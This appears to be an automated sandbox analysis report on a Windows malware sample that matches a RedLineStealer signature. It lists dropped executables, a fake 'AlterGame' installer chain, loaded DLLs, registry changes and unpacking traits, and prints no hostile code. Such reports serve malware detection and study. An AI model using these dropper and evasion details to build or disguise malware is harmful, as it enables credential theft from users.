            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: String function: 00457B30 appears 94 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: String function: 00403684 appears 221 times
            Source: C:\Users\user\Desktop\file.exeCode function: String function: 0063B0C0 appears 34 times
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: String function: 02E58BA0 appears 37 times
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: String function: 02E653F0 appears 139 times
            Source: NqISs1vOr.exe.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: ONE[1].file.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: NqISs1vOr.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: NqISs1vOr.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
            Source: NqISs1vOr.tmp.2.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
            Source: altergame32.exe.3.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
            Source: altergame32.exe.3.drStatic PE information: Resource name: RT_RCDATA type: Delphi compiled form 'TfcDlgArchiveVolumeRequest'
            Source: altergame32.exe.3.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
            Source: is-CUGJK.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: is-CUGJK.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
            Source: is-CUGJK.tmp.3.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
            Source: EShineEncoder.exe.6.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
            Source: EShineEncoder.exe.6.drStatic PE information: Resource name: RT_RCDATA type: Delphi compiled form 'TfcDlgArchiveVolumeRequest'
            Source: EShineEncoder.exe.6.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
            Source: is-HKUEM.tmp.3.drStatic PE information: Number of sections : 19 > 10
            Source: sqlite3.dll.6.drStatic PE information: Number of sections : 19 > 10
            Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.1816811085.0000000000560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: classification engineClassification label: mal100.troj.evad.winEXE@16/40@1/3
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E508C0 FormatMessageA,GetLastError,FormatMessageA,GetLastError,6_2_02E508C0
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,2_2_00409448
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004555B8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,3_2_004555B8
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404530 SetLastError,SetLastError,FindNextVolumeMountPointA,EnumTimeFormatsW,_calloc,__floor_pentium4,GetDllDirectoryW,OpenJobObjectA,InterlockedExchangeAdd,VirtualAlloc,GetLastError,GetDiskFreeSpaceExW,SetConsoleCP,GetSystemDefaultLCID,InterlockedExchange,GetDiskFreeSpaceExW,SetConsoleCP,GetSystemDefaultLCID,OutputDebugStringW,GetUserDefaultLangID,LoadLibraryW,ReadConsoleInputA,LCMapStringA,InterlockedIncrement,LCMapStringA,InterlockedIncrement,OpenEventW,GetCurrentProcess,GetCurrentProcess,GetLastError,GetFileAttributesA,GetShortPathNameW,SetComputerNameExA,GetFileAttributesA,GetShortPathNameW,SetComputerNameExA,FreeEnvironmentStringsW,GetComputerNameA,InterlockedExchange,LoadLibraryW,0_2_00404530
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,6_2_00402B32
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00568303 CreateToolhelp32Snapshot,Module32First,0_2_00568303
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0046DF04 GetVersion,CoCreateInstance,3_2_0046DF04
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,2_2_00409BEC
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\add[1].htmJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7076:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeFile created: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmpJump to behavior
            Source: C:\Users\user\Desktop\file.exeCommand line argument: (LE/0_2_00404830
            Source: C:\Users\user\Desktop\file.exeCommand line argument: [fA0_2_00404830
            Source: C:\Users\user\Desktop\file.exeCommand line argument: rU@0_2_00404830
            Source: C:\Users\user\Desktop\file.exeCommand line argument: u{$0_2_00404830
            Source: C:\Users\user\Desktop\file.exeCommand line argument: &YN90_2_00404830
            Source: C:\Users\user\Desktop\file.exeCommand line argument: {X:0_2_00404830
            Source: C:\Users\user\Desktop\file.exeCommand line argument: Y~o0_2_00404830
            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: altergame32.exe, altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: altergame32.exe, altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
            Source: altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
            Source: altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: altergame32.exe, altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: file.exeReversingLabs: Detection: 36%
            Source: file.exeVirustotal: Detection: 39%
            Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe "C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe"
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeProcess created: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp "C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp" /SL5="$403E6,3817417,54272,C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" pause alter_game_11196
            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpProcess created: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe "C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe" -i
            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause alter_game_11196
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe "C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe "C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe"Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe "C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeProcess created: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp "C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp" /SL5="$403E6,3817417,54272,C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" pause alter_game_11196Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpProcess created: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe "C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe" -iJump to behavior
            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause alter_game_11196Jump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: msacm32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: winmmbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: winmmbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: explorerframe.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: sfc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: sqlite3.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpWindow found: window name: TMainFormJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AlterGame_is1Jump to behavior
            Source: Binary string: msvcp71.pdbx# source: is-PR9GR.tmp.3.dr
            Source: Binary string: msvcr71.pdb< source: is-GSS65.tmp.3.dr
            Source: Binary string: msvcp71.pdb source: is-PR9GR.tmp.3.dr
            Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-28G11.tmp.3.dr
            Source: Binary string: C:\Users\79631\source\repos\Gcleanerapp\Gcleanerapp\obj\Release\Gcleanerapp.pdb source: ebAAb6KfuCx7.exe, 00000008.00000000.1932852369.00000000008F2000.00000002.00000001.01000000.0000000C.sdmp, PAB1[1].file.1.dr, ebAAb6KfuCx7.exe.1.dr
            Source: Binary string: msvcr71.pdb source: is-GSS65.tmp.3.dr

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeUnpacked PE file: 6.2.altergame32.exe.400000.0.unpack _qrsa_4:ER;_qrsb_4:R;_qrsc_4:W;.rsrc:R;_qrsd_4:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeUnpacked PE file: 6.2.altergame32.exe.400000.0.unpack
            Source: ebAAb6KfuCx7.exe.1.drStatic PE information: 0xDEC807D9 [Wed Jun 9 20:26:01 2088 UTC]
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C415 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_0040C415
            Source: initial sampleStatic PE information: section where entry point is pointing to: _qrsa_4
